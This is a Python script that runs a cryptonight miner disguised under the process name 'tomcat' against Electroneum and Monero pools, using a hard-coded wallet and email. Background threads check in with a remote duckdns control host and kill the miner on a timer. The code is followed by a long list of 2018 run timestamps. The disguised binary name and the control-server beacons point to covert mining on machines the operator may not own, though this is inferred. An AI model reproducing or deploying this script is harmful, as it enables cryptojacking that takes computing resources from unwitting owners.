import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:07.502119
#2018-02-17 17:14:06.186916
#2018-02-17 19:02:06.271326
#2018-02-17 20:51:02.168646
#2018-02-17 22:37:07.776374
#2018-02-18 00:21:03.567371
#2018-02-18 02:12:05.638079
#2018-02-18 03:59:01.436752
#2018-02-18 05:47:05.662846
#2018-02-18 07:40:06.573901
#2018-02-18 09:27:03.959197
#2018-02-18 11:13:01.908383
#2018-02-18 12:59:06.671399
#2018-02-18 14:46:07.540612
#2018-02-18 16:34:01.560036
#2018-02-18 18:23:05.277108
#2018-02-18 20:09:04.963177
#2018-02-18 21:55:04.941915
#2018-02-18 23:44:04.230295
#2018-02-19 01:30:01.435626
#2018-02-19 03:18:07.106874
#2018-02-19 05:03:04.944722
#2018-02-19 06:47:04.879569
#2018-02-19 08:38:05.049736
#2018-02-19 10:27:05.697352
#2018-02-19 12:15:07.232418
#2018-02-19 14:03:07.921253
#2018-02-19 15:51:06.366439
#2018-02-19 17:39:09.277483
#2018-02-19 19:28:08.163311
#2018-02-19 21:16:01.706816
#2018-02-19 23:02:05.524846
#2018-02-20 00:47:05.732042
#2018-02-20 02:37:04.552671
#2018-02-20 04:26:05.310059
#2018-02-20 06:10:04.062941
#2018-02-20 07:54:08.081986
#2018-02-20 09:40:07.206085
#2018-02-20 11:24:01.895329
#2018-02-20 13:10:11.053884
#2018-02-20 14:56:08.939019
#2018-02-20 16:41:08.392635
#2018-02-20 18:28:10.891155
#2018-02-20 20:19:08.115078
#2018-02-20 22:06:02.194510
#2018-02-20 23:48:01.266189
#2018-02-21 01:34:01.558317
#2018-02-21 03:21:04.426531
#2018-02-21 05:08:06.404404
#2018-02-21 06:56:01.379226
#2018-02-21 08:42:05.703563
#2018-02-21 10:29:04.921878
#2018-02-21 12:17:02.200509
#2018-02-21 14:04:06.461399
#2018-02-21 15:48:04.578069
#2018-02-21 17:39:09.460661
#2018-02-21 19:25:07.234536
#2018-02-21 21:15:08.135780
#2018-02-21 23:02:07.942491
#2018-02-22 00:50:04.109206
#2018-02-22 02:36:09.399708
#2018-02-22 04:23:04.747680
#2018-02-22 06:11:04.863214
#2018-02-22 07:55:03.231108
#2018-02-22 09:43:07.923622
#2018-02-22 11:28:01.271937
#2018-02-22 13:13:06.935773
#2018-02-22 15:03:07.215271
#2018-02-22 16:46:07.087997
#2018-02-22 18:32:09.216601
#2018-02-22 20:25:06.397448
#2018-02-22 22:12:06.987377
#2018-02-23 00:00:01.653079
#2018-02-23 01:49:06.860227
#2018-02-23 03:39:06.386598
#2018-02-23 05:24:06.937106
#2018-02-23 07:09:07.227854
#2018-02-23 08:59:04.973558
#2018-02-23 11:06:02.243196
#2018-02-23 13:00:05.774175
#2018-02-23 14:44:05.353643
#2018-02-23 16:32:01.447327
#2018-02-23 18:18:10.229547
#2018-02-23 20:03:06.454773
#2018-02-23 21:46:07.139941
#2018-02-23 23:40:03.881647
#2018-02-24 01:32:07.561830
#2018-02-24 03:22:04.564127
#2018-02-24 05:07:06.543257
#2018-02-24 06:56:05.748352
#2018-02-24 08:47:03.599945
#2018-02-24 10:47:05.253635
#2018-02-24 12:34:06.077603
#2018-02-24 14:22:06.624507
#2018-02-24 16:09:04.642080
#2018-02-24 18:00:04.881339
#2018-02-24 19:48:06.782426
#2018-02-24 21:33:07.607096
#2018-02-25 00:20:06.497467
#2018-02-25 04:11:07.579123
#2018-02-25 07:42:06.643133